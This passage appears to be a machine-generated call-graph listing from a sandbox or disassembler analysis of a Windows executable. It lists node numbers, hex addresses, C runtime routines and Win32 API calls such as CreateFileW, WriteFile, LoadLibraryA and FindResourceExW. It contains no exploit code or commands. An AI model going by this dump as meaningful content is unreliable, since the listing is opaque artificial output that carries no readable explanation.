99051->99053 99052->99007 99053->99047 99055 c71b11 __lseeki64_nolock 60 API calls 99054->99055 99056 c78594 99054->99056 99077 c7845a 99054->99077 99057 c78443 99055->99057 99056->99007 99058 c78767 CloseHandle 99056->99058 99061 c68d34 __read 58 API calls 99057->99061 99075 c78462 99057->99075 99059 c77f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99058->99059 99060 
c7878e 99059->99060 99063 c78796 GetLastError 99060->99063 99064 c7861e 99060->99064 99061->99077 99062 c710ab 70 API calls __read_nolock 99062->99075 99065 c68d47 __dosmaperr 58 API calls 99063->99065 99064->99007 99066 c787a2 99065->99066 99068 c6d67d __free_osfhnd 59 API calls 99066->99068 99067 c70d2d __close_nolock 61 API calls 99067->99075 99068->99064 99069 c799f2 __chsize_nolock 82 API calls 99069->99075 99070 c71b11 60 API calls __lseeki64_nolock 99070->99077 99071 c6dac6 __write 78 API calls 99071->99077 99072 c78611 99074 c70d2d __close_nolock 61 API calls 99072->99074 99073 c785fa 99073->99056 99078 c78618 99074->99078 99075->99062 99075->99067 99075->99069 99075->99072 99075->99073 99076 c71b11 60 API calls __lseeki64_nolock 99075->99076 99075->99077 99076->99075 99077->99056 99077->99070 99077->99071 99077->99075 99079 c68d68 __read 58 API calls 99078->99079 99079->99064 99080->98997 99081->99003 99082->99003 99084 c44ce1 99083->99084 99085 c44d9d LoadLibraryA 99083->99085 99084->98885 99084->98888 99085->99084 99086 c44dae GetProcAddress 99085->99086 99086->99084 99088 c60ff6 Mailbox 59 API calls 99087->99088 99089 c453a0 99088->99089 99089->98893 99091 c45003 FindResourceExW 99090->99091 99095 c45020 99090->99095 99092 c7dd5c LoadResource 99091->99092 99091->99095 99093 c7dd71 SizeofResource 99092->99093 99092->99095 99094 c7dd85 LockResource 99093->99094 99093->99095 99094->99095 99095->98894 99097 c45054 99096->99097 99098 c7ddd4 99096->99098 99102 c65a7d 99097->99102 99100 c45062 99100->98905 99101->98894 99103 c65a89 __read 99102->99103 99104 c65a9b 99103->99104 99106 c65ac1 99103->99106 99115 c68d68 58 API calls __getptd_noexit 99104->99115 99117 c66e4e 99106->99117 99108 c65aa0 99116 c68ff6 9 API calls __read 99108->99116 99109 c65ac7 99123 c659ee 83 API calls 5 library calls 99109->99123 99112 c65ad6 99124 c65af8 LeaveCriticalSection LeaveCriticalSection _fseek 99112->99124 99114 c65aab __read 99114->99100 99115->99108 99116->99114 99118 
c66e80 EnterCriticalSection 99117->99118 99119 c66e5e 99117->99119 99120 c66e76 99118->99120 99119->99118 99121 c66e66 99119->99121 99120->99109 99122 c69e4b __lock 58 API calls 99121->99122 99122->99120 99123->99112 99124->99114 99128 c6582d 99125->99128 99127 c4508e 99127->98913 99129 c65839 __read 99128->99129 99130 c6584f _memset 99129->99130 99131 c6587c 99129->99131 99133 c65874 __read 99129->99133 99141 c68d68 58 API calls __getptd_noexit 99130->99141 99132 c66e4e __lock_file 59 API calls 99131->99132 99134 c65882 99132->99134 99133->99127 99143 c6564d 72 API calls 6 library calls 99134->99143 99137 c65869 99142 c68ff6 9 API calls __read 99137->99142 99138 c65898 99144 c658b6 LeaveCriticalSection LeaveCriticalSection _fseek 99138->99144 99141->99137 99142->99133 99143->99138 99144->99133 99146 c65e9c __read 99145->99146 99147 c65ec3 99146->99147 99148 c65eae 99146->99148 99150 c66e4e __lock_file 59 API calls 99147->99150 99159 c68d68 58 API calls __getptd_noexit 99148->99159 99152 c65ec9 99150->99152 99151 c65eb3 99160 c68ff6 9 API calls __read 99151->99160 99161 c65b00 67 API calls 6 library calls 99152->99161 99155 c65ebe __read 99155->98918 99156 c65ed4 99162 c65ef4 LeaveCriticalSection LeaveCriticalSection _fseek 99156->99162 99158 c65ee6 99158->99155 99159->99151 99160->99155 99161->99156 99162->99158 99163->98783 99164->98799 99165->98801 99166->98797 99167->98805 99169 c492c9 Mailbox 99168->99169 99170 c7f5c8 99169->99170 99175 c492d3 99169->99175 99171 c60ff6 Mailbox 59 API calls 99170->99171 99173 c7f5d4 99171->99173 99172 c492da 99172->98810 99175->99172 99176 c49df0 59 API calls Mailbox 99175->99176 99176->99175 99177->98821 99178->98816 99179->98826 99180->98844 99181->98853 99183 c655e2 __read 99182->99183 99184 c655f6 99183->99184 99185 c6560e 99183->99185 99211 c68d68 58 API calls __getptd_noexit 99184->99211 99187 c65606 __read 99185->99187 99188 c66e4e __lock_file 59 API calls 99185->99188 99187->98859 99190 c65620 99188->99190 99189 c655fb 
99212 c68ff6 9 API calls __read 99189->99212 99195 c6556a 99190->99195 99196 c6558d 99195->99196 99197 c65579 99195->99197 99209 c65589 99196->99209 99214 c64c6d 99196->99214 99257 c68d68 58 API calls __getptd_noexit 99197->99257 99199 c6557e 99258 c68ff6 9 API calls __read 99199->99258 99206 c655a7 99231 c70c52 99206->99231 99208 c655ad 99208->99209 99210 c62f95 _free 58 API calls 99208->99210 99213 c65645 LeaveCriticalSection LeaveCriticalSection _fseek 99209->99213 99210->99209 99211->99189 99212->99187 99213->99187 99215 c64ca4 99214->99215 99216 c64c80 99214->99216 99220 c70dc7 99215->99220 99216->99215 99217 c64916 _fprintf 58 API calls 99216->99217 99218 c64c9d 99217->99218 99259 c6dac6 99218->99259 99221 c655a1 99220->99221 99222 c70dd4 99220->99222 99224 c64916 99221->99224 99222->99221 99223 c62f95 _free 58 API calls 99222->99223 99223->99221 99225 c64935 99224->99225 99226 c64920 99224->99226 99225->99206 99394 c68d68 58 API calls __getptd_noexit 99226->99394 99228 c64925 99395 c68ff6 9 API calls __read 99228->99395 99230 c64930 99230->99206 99232 c70c5e __read 99231->99232 99233 c70c82 99232->99233 99234 c70c6b 99232->99234 99236 c70d0d 99233->99236 99238 c70c92 99233->99238 99411 c68d34 58 API calls __getptd_noexit 99234->99411 99416 c68d34 58 API calls __getptd_noexit 99236->99416 99237 c70c70 99412 c68d68 58 API calls __getptd_noexit 99237->99412 99241 c70cb0 99238->99241 99242 c70cba 99238->99242 99413 c68d34 58 API calls __getptd_noexit 99241->99413 99244 c6d446 ___lock_fhandle 59 API calls 99242->99244 99243 c70cb5 99417 c68d68 58 API calls __getptd_noexit 99243->99417 99247 c70cc0 99244->99247 99249 c70cd3 99247->99249 99250 c70cde 99247->99250 99248 c70d19 99418 c68ff6 9 API calls __read 99248->99418 99396 c70d2d 99249->99396 99414 c68d68 58 API calls __getptd_noexit 99250->99414 99253 c70c77 __read 99253->99208 99255 c70cd9 99415 c70d05 LeaveCriticalSection __unlock_fhandle 99255->99415 99257->99199 99258->99209 99260 c6dad2 __read 99259->99260 
99261 c6dadf 99260->99261 99264 c6daf6 99260->99264 99360 c68d34 58 API calls __getptd_noexit 99261->99360 99263 c6db95 99366 c68d34 58 API calls __getptd_noexit 99263->99366 99264->99263 99266 c6db0a 99264->99266 99265 c6dae4 99361 c68d68 58 API calls __getptd_noexit 99265->99361 99269 c6db32 99266->99269 99270 c6db28 99266->99270 99287 c6d446 99269->99287 99362 c68d34 58 API calls __getptd_noexit 99270->99362 99271 c6db2d 99367 c68d68 58 API calls __getptd_noexit 99271->99367 99274 c6db38 99276 c6db5e 99274->99276 99277 c6db4b 99274->99277 99363 c68d68 58 API calls __getptd_noexit 99276->99363 99296 c6dbb5 99277->99296 99278 c6dba1 99368 c68ff6 9 API calls __read 99278->99368 99281 c6daeb __read 99281->99215 99283 c6db57 99365 c6db8d LeaveCriticalSection __unlock_fhandle 99283->99365 99284 c6db63 99364 c68d34 58 API calls __getptd_noexit 99284->99364 99288 c6d452 __read 99287->99288 99289 c6d4a1 EnterCriticalSection 99288->99289 99290 c69e4b __lock 58 API calls 99288->99290 99291 c6d4c7 __read 99289->99291 99292 c6d477 99290->99292 99291->99274 99293 c6d48f 99292->99293 99369 c6a06b InitializeCriticalSectionAndSpinCount 99292->99369 99370 c6d4cb LeaveCriticalSection _doexit 99293->99370 99297 c6dbc2 __ftell_nolock 99296->99297 99298 c6dc20 99297->99298 99299 c6dc01 99297->99299 99330 c6dbf6 99297->99330 99304 c6dc78 99298->99304 99305 c6dc5c 99298->99305 99380 c68d34 58 API calls __getptd_noexit 99299->99380 99300 c6c836 __cftoe2_l 6 API calls 99302 c6e416 99300->99302 99302->99283 99303 c6dc06 99381 c68d68 58 API calls __getptd_noexit 99303->99381 99308 c6dc91 99304->99308 99386 c71b11 60 API calls 3 library calls 99304->99386 99383 c68d34 58 API calls __getptd_noexit 99305->99383 99371 c75ebb 99308->99371 99309 c6dc61 99384 c68d68 58 API calls __getptd_noexit 99309->99384 99310 c6dc0d 99382 c68ff6 9 API calls __read 99310->99382 99315 c6dc9f 99317 c6dff8 99315->99317 99387 c69bec 58 API calls 2 library calls 99315->99387 99316 c6dc68 99385 c68ff6 9 API calls 
__read 99316->99385 99318 c6e016 99317->99318 99319 c6e38b WriteFile 99317->99319 99322 c6e13a 99318->99322 99328 c6e02c 99318->99328 99323 c6dfeb GetLastError 99319->99323 99332 c6dfb8 99319->99332 99333 c6e22f 99322->99333 99335 c6e145 99322->99335 99323->99332 99324 c6dccb GetConsoleMode 99324->99317 99326 c6dd0a 99324->99326 99325 c6e3c4 99325->99330 99392 c68d68 58 API calls __getptd_noexit 99325->99392 99326->99317 99327 c6dd1a GetConsoleCP 99326->99327 99327->99325 99354 c6dd49 99327->99354 99328->99325 99329 c6e09b WriteFile 99328->99329 99329->99323 99334 c6e0d8 99329->99334 99330->99300 99332->99325 99332->99330 99337 c6e118 99332->99337 99333->99325 99340 c6e2a4 WideCharToMultiByte 99333->99340 99334->99328 99341 c6e0fc 99334->99341 99335->99325 99342 c6e1aa WriteFile 99335->99342 99336 c6e3f2 99393 c68d34 58 API calls __getptd_noexit 99336->99393 99338 c6e123 99337->99338 99339 c6e3bb 99337->99339 99389 c68d68 58 API calls __getptd_noexit 99338->99389 99391 c68d47 58 API calls 2 library calls 99339->99391 99340->99323 99352 c6e2eb 99340->99352 99341->99332 99342->99323 99346 c6e1f9 99342->99346 99346->99332 99346->99335 99346->99341 99347 c6e128 99390 c68d34 58 API calls __getptd_noexit 99347->99390 99348 c6e2f3 WriteFile 99351 c6e346 GetLastError 99348->99351 99348->99352 99351->99352 99352->99332 99352->99333 99352->99341 99352->99348 99353 c77cae WriteConsoleW CreateFileW __putwch_nolock 99358 c6de9f 99353->99358 99354->99332 99355 c6de32 WideCharToMultiByte 99354->99355 99356 c7650a 60 API calls __write_nolock 99354->99356 99354->99358 99388 c63835 58 API calls __isleadbyte_l 99354->99388 99355->99332 99357 c6de6d WriteFile 99355->99357 99356->99354 99357->99323 99357->99358 99358->99323 99358->99332 99358->99353 99358->99354 99359 c6dec7 WriteFile 99358->99359 99359->99323 99359->99358 99360->99265 99361->99281 99362->99271 99363->99284 99364->99283 99365->99281 99366->99271 99367->99278 99368->99281 99369->99293 99370->99289 99372 c75ec6 
99371->99372 99373 c75ed3 99371->99373 99374 c68d68 __read 58 API calls 99372->99374 99375 c75edf 99373->99375 99376 c68d68 __read 58 API calls 99373->99376 99377 c75ecb 99374->99377 99375->99315 99378 c75f00 99376->99378 99377->99315 99379 c68ff6 __read 9 API calls 99378->99379 99379->99377 99380->99303 99381->99310 99382->99330 99383->99309 99384->99316 99385->99330 99386->99308 99387->99324 99388->99354 99389->99347 99390->99330 99391->99330 99392->99336 99393->99330 99394->99228 99395->99230 99419 c6d703 99396->99419 99398 c70d91 99432 c6d67d 59 API calls __read 99398->99432 99399 c70d3b 99399->99398 99401 c70d6f 99399->99401 99402 c6d703 __lseeki64_nolock 58 API calls 99399->99402 99401->99398 99403 c6d703 __lseeki64_nolock 58 API calls 99401->99403 99405 c70d66 99402->99405 99406 c70d7b CloseHandle 99403->99406 99404 c70d99 99407 c70dbb 99404->99407 99433 c68d47 58 API calls 2 library calls 99404->99433 99408 c6d703 __lseeki64_nolock 58 API calls 99405->99408 99406->99398 99409 c70d87 GetLastError 99406->99409 99407->99255 99408->99401 99409->99398 99411->99237 99412->99253 99413->99243 99414->99255 99415->99253 99416->99243 99417->99248 99418->99253 99420 c6d723 99419->99420 99421 c6d70e 99419->99421 99426 c6d748 99420->99426 99436 c68d34 58 API calls __getptd_noexit 99420->99436 99434 c68d34 58 API calls __getptd_noexit 99421->99434 99423 c6d713 99435 c68d68 58 API calls __getptd_noexit 99423->99435 99426->99399 99427 c6d752 99437 c68d68 58 API calls __getptd_noexit 99427->99437 99429 c6d71b 99429->99399 99430 c6d75a 99438 c68ff6 9 API calls __read 99430->99438 99432->99404 99433->99407 99434->99423 99435->99429 99436->99427 99437->99430 99438->99429 99501 c71b90 99439->99501 99442 c448f7 99503 c47eec 99442->99503 99443 c448da 99445 c47d2c 59 API calls 99443->99445 99446 c448e6 99445->99446 99447 c47886 59 API calls 99446->99447 99448 c448f2 99447->99448 99449 c609d5 99448->99449 99450 c71b90 __ftell_nolock 99449->99450 99451 c609e2 GetLongPathNameW 
99450->99451 99452 c47d2c 59 API calls 99451->99452 99453 c4741d 99452->99453 99454 c4716b 99453->99454 99455 c477c7 59 API calls 99454->99455 99456 c4717d 99455->99456 99457 c448ae 60 API calls 99456->99457 99458 c47188 99457->99458 99459 c47193 99458->99459 99460 c7ecae 99458->99460 99461 c43f84 59 API calls 99459->99461 99466 c7ecc8 99460->99466 99513 c47a68 61 API calls 99460->99513 99463 c4719f 99461->99463 99507 c434c2 99463->99507 99465 c471b2 Mailbox 99465->98609 99468 c44f3d 136 API calls 99467->99468 99469 c469ef 99468->99469 99470 c7e45a 99469->99470 99471 c44f3d 136 API calls 99469->99471 99472 ca97e5 122 API calls 99470->99472 99473 c46a03 99471->99473 99474 c7e46f 99472->99474 99473->99470 99475 c46a0b 99473->99475 99476 c7e473 99474->99476 99477 c7e490 99474->99477 99479 c46a17 99475->99479 99480 c7e47b 99475->99480 99481 c44faa 84 API calls 99476->99481 99478 c60ff6 Mailbox 59 API calls 99477->99478 99486 c7e4d5 Mailbox 99478->99486 99514 c46bec 99479->99514 99621 ca4534 90 API calls _wprintf 99480->99621 99481->99480 99485 c7e489 99485->99477 99487 c7e689 99486->99487 99491 c7e69a 99486->99491 99498 c47f41 59 API calls 99486->99498 99607 c4766f 99486->99607 99615 c474bd 99486->99615 99622 c9fc4d 59 API calls 2 library calls 99486->99622 99623 c9fb6e 61 API calls 2 library calls 99486->99623 99624 ca7621 59 API calls Mailbox 99486->99624 99488 c62f95 _free 58 API calls 99487->99488 99489 c7e691 99488->99489 99490 c44faa 84 API calls 99489->99490 99490->99491 99495 c62f95 _free 58 API calls 99491->99495 99496 c44faa 84 API calls 99491->99496 99625 c9fcb1 89 API calls 4 library calls 99491->99625 99495->99491 99496->99491 99498->99486 99502 c448bb GetFullPathNameW 99501->99502 99502->99442 99502->99443 99504 c47f06 99503->99504 99506 c47ef9 99503->99506 99505 c60ff6 Mailbox 59 API calls 99504->99505 99505->99506 99506->99446 99508 c434d4 99507->99508 99512 c434f3 _memmove 99507->99512 99510 c60ff6 Mailbox 59 API calls 99508->99510 99509 c60ff6 Mailbox 
59 API calls 99511 c4350a 99509->99511 99510->99512 99511->99465 99512->99509 99513->99460 99515 c7e847 99514->99515 99516 c46c15 99514->99516 99698 c9fcb1 89 API calls 4 library calls 99515->99698 99631 c45906 60 API calls Mailbox 99516->99631 99519 c7e85a 99699 c9fcb1 89 API calls 4 library calls 99519->99699 99520 c46c37 99632 c45956 67 API calls 99520->99632 99522 c46c4c 99522->99519 99524 c46c54 99522->99524 99525 c477c7 59 API calls 99524->99525 99527 c46c60 99525->99527 99526 c7e876 99558 c46cc1 99526->99558 99633 c60b9b 60 API calls __ftell_nolock 99527->99633 99529 c46c6c 99532 c477c7 59 API calls 99529->99532 99530 c46ccf 99534 c477c7 59 API calls 99530->99534 99531 c7e889 99533 c45dcf CloseHandle 99531->99533 99535 c46c78 99532->99535 99536 c7e895 99533->99536 99537 c46cd8 99534->99537 99538 c448ae 60 API calls 99535->99538 99539 c44f3d 136 API calls 99536->99539 99540 c477c7 59 API calls 99537->99540 99542 c46c86 99538->99542 99543 c7e8b1 99539->99543 99541 c46ce1 99540->99541 99636 c446f9 99541->99636 99634 c459b0 ReadFile SetFilePointerEx 99542->99634 99546 c7e8da 99543->99546 99550 ca97e5 122 API calls 99543->99550 99700 c9fcb1 89 API calls 4 library calls 99546->99700 99547 c46cf8 99552 c47c8e 59 API calls 99547->99552 99549 c46cb2 99635 c45c4e SetFilePointerEx SetFilePointerEx 99549->99635 99551 c7e8cd 99550->99551 99555 c7e8f6 99551->99555 99556 c7e8d5 99551->99556 99557 c46d09 SetCurrentDirectoryW 99552->99557 99553 c7e8f1 99585 c46e6c Mailbox 99553->99585 99560 c44faa 84 API calls 99555->99560 99559 c44faa 84 API calls 99556->99559 99563 c46d1c Mailbox 99557->99563 99558->99530 99558->99531 99559->99546 99561 c7e8fb 99560->99561 99562 c60ff6 Mailbox 59 API calls 99561->99562 99569 c7e92f 99562->99569 99565 c60ff6 Mailbox 59 API calls 99563->99565 99567 c46d2f 99565->99567 99566 c43bcd 99566->98476 99566->98500 99568 c4538e 59 API calls 99567->99568 99596 c46d3a Mailbox __wsetenvp 99568->99596 99570 c4766f 59 API calls 99569->99570 99604 c7e978 
Mailbox 99570->99604 99571 c46e47 99694 c45dcf 99571->99694 99572 c7eb69 99705 ca7581 59 API calls Mailbox 99572->99705 99575 c46e53 SetCurrentDirectoryW 99575->99585 99578 c7eb8b 99706 caf835 59 API calls 2 library calls 99578->99706 99581 c7eb98 99583 c62f95 _free 58 API calls 99581->99583 99582 c7ec02 99709 c9fcb1 89 API calls 4 library calls 99582->99709 99583->99585 99626 c45934 99585->99626 99587 c4766f 59 API calls 99587->99604 99588 c7ec1b 99588->99571 99590 c7ebfa 99708 c9fb07 59 API calls 4 library calls 99590->99708 99591 c47f41 59 API calls 99591->99596 99596->99571 99596->99582 99596->99590 99596->99591 99687 c459cd 67 API calls _wcscpy 99596->99687 99688 c470bd GetStringTypeW 99596->99688 99689 c4702c 60 API calls __wcsnicmp 99596->99689 99690 c4710a GetStringTypeW __wsetenvp 99596->99690 99691 c6387d GetStringTypeW _iswctype 99596->99691 99692 c46a3c 165 API calls 3 library calls 99596->99692 99693 c47373 59 API calls Mailbox 99596->99693 99597 c47f41 59 API calls 99597->99604 99601 c7ebbb 99707 c9fcb1 89 API calls 4 library calls 99601->99707 99603 c7ebd4 99605 c62f95 _free 58 API calls 99603->99605 99604->99572 99604->99587 99604->99597 99604->99601 99701 c9fc4d 59 API calls 2 library calls 99604->99701 99702 c9fb6e 61 API calls 2 library calls 99604->99702 99703 ca7621 59 API calls Mailbox 99604->99703 99704 c47373 59 API calls Mailbox 99604->99704 99606 c7ebe7 99605->99606 99606->99585 99608 c4770f 99607->99608 99611 c47682 _memmove 99607->99611 99610 c60ff6 Mailbox 59 API calls 99608->99610 99609 c60ff6 Mailbox 59 API calls 99612 c47689 99609->99612 99610->99611 99611->99609 99613 c60ff6 Mailbox 59 API calls 99612->99613 99614 c476b2 99612->99614 99613->99614 99614->99486 99616 c474d0 99615->99616 99618 c4757e 99615->99618 99617 c60ff6 Mailbox 59 API calls 99616->99617 99620 c47502 99616->99620 99617->99620 99618->99486 99619 c60ff6 59 API calls Mailbox 99619->99620 99620->99618 99620->99619 99621->99485 99622->99486 99623->99486 99624->99486 
99625->99491 99627 c45dcf CloseHandle 99626->99627 99628 c4593c Mailbox 99627->99628 99629 c45dcf CloseHandle 99628->99629 99630 c4594b 99629->99630 99630->99566 99631->99520 99632->99522 99633->99529 99634->99549 99635->99558 99637 c477c7 59 API calls 99636->99637 99638 c4470f 99637->99638 99639 c477c7 59 API calls 99638->99639 99640 c44717 99639->99640 99641 c477c7 59 API calls 99640->99641 99642 c4471f 99641->99642 99643 c477c7 59 API calls 99642->99643 99644 c44727 99643->99644 99645 c7d8fb 99644->99645 99646 c4475b 99644->99646 99647 c481a7 59 API calls 99645->99647 99648 c479ab 59 API calls 99646->99648 99649 c7d904 99647->99649 99650 c44769 99648->99650 99651 c47eec 59 API calls 99649->99651 99652 c47e8c 59 API calls 99650->99652 99654 c4479e 99651->99654 99653 c44773 99652->99653 99653->99654 99655 c479ab 59 API calls 99653->99655 99656 c447de 99654->99656 99658 c447bd 99654->99658 99669 c7d924 99654->99669 99659 c44794 99655->99659 99710 c479ab 99656->99710 99663 c47b52 59 API calls 99658->99663 99662 c47e8c 59 API calls 99659->99662 99660 c447ef 99664 c44801 99660->99664 99667 c481a7 59 API calls 99660->99667 99661 c7d9f4 99665 c47d2c 59 API calls 99661->99665 99662->99654 99666 c447c7 99663->99666 99668 c44811 99664->99668 99671 c481a7 59 API calls 99664->99671 99677 c7d9b1 99665->99677 99666->99656 99670 c479ab 59 API calls 99666->99670 99667->99664 99673 c44818 99668->99673 99674 c481a7 59 API calls 99668->99674 99669->99661 99672 c7d9dd 99669->99672 99684 c7d95b 99669->99684 99670->99656 99671->99668 99672->99661 99679 c7d9c8 99672->99679 99675 c4481f Mailbox 99673->99675 99676 c481a7 59 API calls 99673->99676 99674->99673 99675->99547 99676->99675 99677->99656 99678 c47b52 59 API calls 99677->99678 99723 c47a84 59 API calls 2 library calls 99677->99723 99678->99677 99681 c47d2c 59 API calls 99679->99681 99680 c7d9b9 99682 c47d2c 59 API calls 99680->99682 99681->99677 99682->99677 99684->99680 99685 c7d9a4 99684->99685 99686 c47d2c 59 API calls 
99685->99686 99686->99677 99687->99596 99688->99596 99689->99596 99690->99596 99691->99596 99692->99596 99693->99596 99695 c45de8 99694->99695 99696 c45dd9 99694->99696 99695->99696 99697 c45ded CloseHandle 99695->99697 99696->99575 99697->99696 99698->99519 99699->99526 99700->99553 99701->99604 99702->99604 99703->99604 99704->99604 99705->99578 99706->99581 99707->99603 99708->99582 99709->99588 99711 c47a17 99710->99711 99712 c479ba 99710->99712 99713 c47e8c 59 API calls 99711->99713 99712->99711 99714 c479c5 99712->99714 99720 c479e8 _memmove 99713->99720 99715 c479e0 99714->99715 99716 c7ef32 99714->99716 99724 c48087 59 API calls Mailbox 99715->99724 99717 c48189 59 API calls 99716->99717 99719 c7ef3c 99717->99719 99721 c60ff6 Mailbox 59 API calls 99719->99721 99720->99660 99722 c7ef5c 99721->99722 99723->99677 99724->99720 99726 c46ef5 99725->99726 99730 c47009 99725->99730 99727 c60ff6 Mailbox 59 API calls 99726->99727 99726->99730 99729 c46f1c 99727->99729 99728 c60ff6 Mailbox 59 API calls 99731 c46f91 99728->99731 99729->99728 99730->98615 99731->99730 99733 c474bd 59 API calls 99731->99733 99735 c4766f 59 API calls 99731->99735 99738 c463a0 94 API calls 2 library calls 99731->99738 99739 c96ac9 59 API calls Mailbox 99731->99739 99733->99731 99735->99731 99736->98617 99737->98619 99738->99731 99739->99731 99740->98633 99741->98634 99743 c44227 99742->99743 99744 c7d638 99742->99744 99743->98643 99768 ca3226 62 API calls _W_store_winword 99743->99768 99744->99743 99745 c7d641 DestroyIcon 99744->99745 99745->99743 99747 c44200 Mailbox 99746->99747 99748 c44129 99746->99748 99747->98646 99769 c47b76 99748->99769 99751 c44144 99753 c47d2c 59 API calls 99751->99753 99752 c7d5dd LoadStringW 99755 c7d5f7 99752->99755 99754 c44159 99753->99754 99754->99755 99756 c4416a 99754->99756 99757 c47c8e 59 API calls 99755->99757 99758 c44174 99756->99758 99759 c44205 99756->99759 99762 c7d601 99757->99762 99761 c47c8e 59 API calls 99758->99761 99760 c481a7 59 API calls 
99759->99760 99765 c4417e _memset _wcscpy 99760->99765 99761->99765 99763 c47e0b 59 API calls 99762->99763 99762->99765 99764 c7d623 99763->99764 99767 c47e0b 59 API calls 99764->99767 99766 c441e6 Shell_NotifyIconW 99765->99766 99766->99747 99767->99765 99768->98643 99770 c60ff6 Mailbox 59 API calls 99769->99770 99771 c47b9b 99770->99771 99772 c48189 59 API calls 99771->99772 99773 c44137 99772->99773 99773->99751 99773->99752 99775 c4e835 99774->99775 99776 c83ed3 99775->99776 99780 c4e89f 99775->99780 99791 c4e8f9 99775->99791 99848 c4a000 99776->99848 99777 c4ebe1 99781 c477c7 59 API calls 99777->99781 99792 c4ead0 Mailbox 99777->99792 99779 c83ee8 99779->99792 99871 caa0b5 89 API calls 4 library calls 99779->99871 99780->99777 99783 c477c7 59 API calls 99780->99783 99780->99791 99784 c83f67 99781->99784 99785 c83f2e 99783->99785 99786 c62f80 __cinit 67 API calls 99784->99786 99787 c62f80 __cinit 67 API calls 99785->99787 99786->99792 99787->99791 99788 c83f50 99788->98688 99789 caa0b5 89 API calls 99789->99792 99790 c48620 69 API calls 99790->99792 99791->99777 99791->99788 99791->99792 99795 c4eaba 99791->99795 99792->99789 99792->99790 99793 c4f2f5 99792->99793 99797 c4a000 341 API calls 99792->99797 99801 c48ea0 59 API calls 99792->99801 99806 c4ebd8 99792->99806 99847 c480d7 59 API calls 2 library calls 99792->99847 99873 c97405 59 API calls 99792->99873 99874 cbc8d7 341 API calls 99792->99874 99875 cbb851 341 API calls Mailbox 99792->99875 99877 c49df0 59 API calls Mailbox 99792->99877 99878 cb96db 341 API calls Mailbox 99792->99878 99876 caa0b5 89 API calls 4 library calls 99793->99876 99795->99792 99872 caa0b5 89 API calls 4 library calls 99795->99872 99797->99792 99800 c8424f 99800->98688 99801->99792 99806->98688 99808 c4f7b0 99807->99808 99809 c4f61a 99807->99809 99812 c47f41 59 API calls 99808->99812 99810 c84848 99809->99810 99811 c4f626 99809->99811 99973 cbbf80 341 API calls Mailbox 99810->99973 99971 c4f3f0 341 API calls 2 library calls 
99811->99971 99818 c4f6ec Mailbox 99812->99818 99815 c84856 99819 c4f790 99815->99819 99974 caa0b5 89 API calls 4 library calls 99815->99974 99817 c4f65d 99817->99815 99817->99818 99817->99819 99885 cacde5 99818->99885 99965 ca3e73 99818->99965 99968 cbe237 99818->99968 99819->98688 99821 c4f743 99821->99819 99972 c49df0 59 API calls Mailbox 99821->99972 99825->98688 99826->98688 99827->98688 99828->98653 99829->98657 99830->98688 99831->98662 99832->98662 99833->98662 99834->98688 99835->98688 99836->98688 99837->98688 99838->98688 99839->98688 99840->98703 99841->98703 99842->98703 99843->98703 99844->98703 99845->98703 99846->98703 99847->99792 99849 c4a01f 99848->99849 99868 c4a04d Mailbox 99848->99868 99850 c60ff6 Mailbox 59 API calls 99849->99850 99850->99868 99851 c4b5d5 99853 c481a7 59 API calls 99851->99853 99852 c4b5da 99884 caa0b5 89 API calls 4 library calls 99852->99884 99866 c4a1b7 99853->99866 99854 c97405 59 API calls 99854->99868 99857 c60ff6 59 API calls Mailbox 99857->99868 99858 c481a7 59 API calls 99858->99868 99859 c8047f 99881 caa0b5 89 API calls 4 library calls 99859->99881 99861 c477c7 59 API calls 99861->99868 99864 c8048e 99864->99779 99865 c62f80 67 API calls __cinit 99865->99868 99866->99779 99867 c80e00 99883 caa0b5 89 API calls 4 library calls 99867->99883 99868->99851 99868->99852 99868->99854 99868->99857 99868->99858 99868->99859 99868->99861 99868->99865 99868->99866 99868->99867 99870 c4a6ba 99868->99870 99879 c4ca20 341 API calls 2 library calls 99868->99879 99880 c4ba60 60 API calls Mailbox 99868->99880 99882 caa0b5 89 API calls 4 library calls 99870->99882 99871->99792 99872->99792 99873->99792 99874->99792 99875->99792 99876->99800 99877->99792 99878->99792 99879->99868 99880->99868 99881->99864 99882->99866 99883->99852 99884->99866 99886 c477c7 59 API calls 99885->99886 99887 cace1a 99886->99887 99888 c477c7 59 API calls 99887->99888 99889 cace23 99888->99889 99890 cace37 99889->99890 100084 c49c9c 59 API calls 
99889->100084 99892 c49997 84 API calls 99890->99892 99893 cace54 99892->99893 99894 cace76 99893->99894 99895 cacf55 99893->99895 99901 cacf85 Mailbox 99893->99901 99896 c49997 84 API calls 99894->99896 99897 c44f3d 136 API calls 99895->99897 99899 cace82 99896->99899 99898 cacf69 99897->99898 99900 cacf81 99898->99900 99904 c44f3d 136 API calls 99898->99904 99902 c481a7 59 API calls 99899->99902 99900->99901 99905 c477c7 59 API calls 99900->99905 99901->99821 99903 cace8e 99902->99903 99908 cacea2 99903->99908 99909 caced4 99903->99909 99904->99900 99906 cacfb6 99905->99906 99907 c477c7 59 API calls 99906->99907 99910 cacfbf 99907->99910 99911 c481a7 59 API calls 99908->99911 99912 c49997 84 API calls 99909->99912 99913 c477c7 59 API calls 99910->99913 99914 caceb2 99911->99914 99915 cacee1 99912->99915 99916 cacfc8 99913->99916 99918 c47e0b 59 API calls 99914->99918 99919 c481a7 59 API calls 99915->99919 99917 c477c7 59 API calls 99916->99917 99920 cacfd1 99917->99920 99921 cacebc 99918->99921 99922 caceed 99919->99922 99924 c49997 84 API calls 99920->99924 99925 c49997 84 API calls 99921->99925 100085 ca4cd3 GetFileAttributesW 99922->100085 99927 cacfde 99924->99927 99928 cacec8 99925->99928 99926 cacef6 99929 cacf09 99926->99929 99932 c47b52 59 API calls 99926->99932 99930 c446f9 59 API calls 99927->99930 99931 c47c8e 59 API calls 99928->99931 99934 c49997 84 API calls 99929->99934 99937 cacf0f 99929->99937 99933 cacff9 99930->99933 99931->99909 99932->99929 99935 c47b52 59 API calls 99933->99935 99936 cacf36 99934->99936 99938 cad008 99935->99938 100086 ca3a2b 75 API calls Mailbox 99936->100086 99937->99901 99940 cad03c 99938->99940 99942 c47b52 59 API calls 99938->99942 99941 c481a7 59 API calls 99940->99941 99943 cad04a 99941->99943 99944 cad019 99942->99944 99945 c47c8e 59 API calls 99943->99945 99944->99940 99947 c47d2c 59 API calls 99944->99947 99946 cad058 99945->99946 99948 c47c8e 59 API calls 99946->99948 99949 cad02e 99947->99949 99950 cad066 
